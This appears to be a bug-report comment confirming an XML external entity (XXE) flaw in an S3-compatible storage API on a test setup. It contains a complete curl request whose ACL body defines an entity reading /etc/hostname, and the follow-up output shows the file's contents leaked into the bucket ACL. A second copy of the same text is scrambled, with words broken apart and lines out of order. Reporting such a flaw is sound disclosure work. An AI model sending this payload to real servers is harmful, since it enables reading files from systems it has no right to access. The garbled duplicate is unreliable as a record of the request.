NOTE: in the original bug description there is a trailing ';' at the end of the <AccessControlPolicy> element that I didn't spot for a while and it cause malformed xml errors.
Confirmed on my vsaio:
``` vagrant@vagrant:~$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: cfef77034aa96b13190894b26347367d4e95bc3aa2212f467eaae66c75250510" -H "X-Amz-Date: 20221220T193239Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20221220/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=660efe254e6d3210293e778718b5391ca831e2c814c8ec1ebb9300d004430d78" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]> <AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Owner> <DisplayName>test:tester</DisplayName> <ID>test:tester</ID> </Owner> <AccessControlList> <Grant> <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser"> <DisplayName>&xxe;</DisplayName> <ID>&xxe;</ID> </Grantee> <Permission>WRITE</Permission> </Grant> </AccessControlList> </AccessControlPolicy>' vagrant@vagrant:~$ aws s3api get-bucket-acl --bucket my-bucket { "Owner": { "DisplayName": "test:tester", "ID": "test:tester" }, "Grants": [ { "Grantee": { "DisplayName": "vagrant\n", "ID": "vagrant\n", "Type": "CanonicalUser" }, "Permission": "WRITE" } ] } ```
NOTE: in the original bug description there is a trailing ';' at the end of the <AccessControlP olicy> element that I didn't spot for a while and it cause malformed xml errors.
Confirmed on my vsaio:
``` saio3:8080/ my-bucket? acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/ x-www-form- urlencoded; charset=utf-8" -H "X-Amz- Content- Sha256: cfef77034aa96b1 3190894b2634736 7d4e95bc3aa2212 f467eaae66c7525 0510" -H "X-Amz-Date: 20221220T193239Z" -H "Authorization: AWS4-HMAC-SHA256 Credential= test:tester/ 20221220/ us-east- 1/s3/aws4_ request, SignedHeaders= content- length; content- type;host; x-amz-content- sha256; x-amz-date, Signature= 660efe254e6d321 0293e778718b539 1ca831e2c814c8e c1ebb9300d00443 0d78" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:/ //etc/hostname" > ]> olicy xmlns="http:// s3.amazonaws. com/doc/ 2006-03- 01/"> e>test: tester< /DisplayName> test:tester< /ID> www.w3. org/2001/ XMLSchema- instance" xsi:type= "CanonicalUser" >
<DisplayNa me>&xxe; </DisplayName>
<ID> &xxe;</ ID>
<Permission> WRITE</ Permission> List> Policy> '
"DisplayName" : "test:tester",
"Grantee" : {
"DisplayName" : "vagrant\n",
"ID": "vagrant\n",
"Type" : "CanonicalUser"
"Permissio n": "WRITE"
vagrant@vagrant:~$ curl 'http://
<AccessControlP
<Owner>
<DisplayNam
<ID>
</Owner>
<AccessControlList>
<Grant>
<Grantee xmlns:xsi="http://
</Grantee>
</Grant>
</AccessControl
</AccessControl
vagrant@vagrant:~$ aws s3api get-bucket-acl --bucket my-bucket
{
"Owner": {
"ID": "test:tester"
},
"Grants": [
{
},
}
]
}
```